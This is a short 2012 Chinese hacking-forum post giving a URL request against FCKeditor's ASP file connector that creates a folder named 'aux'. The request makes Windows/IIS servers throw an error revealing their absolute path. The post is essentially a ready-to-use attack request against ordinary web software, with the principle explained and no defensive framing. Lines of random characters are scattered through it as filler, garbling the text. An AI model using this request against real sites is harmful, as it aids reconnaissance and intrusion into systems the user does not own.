中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
% X7 K# U( x/ ?5 W# R1 \, K) ~) V
# ~! G/ T3 P/ I- M+ l% r
2 w$ r, \1 e7 B
版本未测试。。。
$ X- D) L6 u3 z5 i
# T% ]/ J; R4 V( E* O% R/ y+ g
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
) R) m% _. w0 D5 D
" U' G; f8 o, B% ]
1 u$ P) ]- e: Z& p
听说IIS都可以。。
8 N$ |* O, b6 d
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2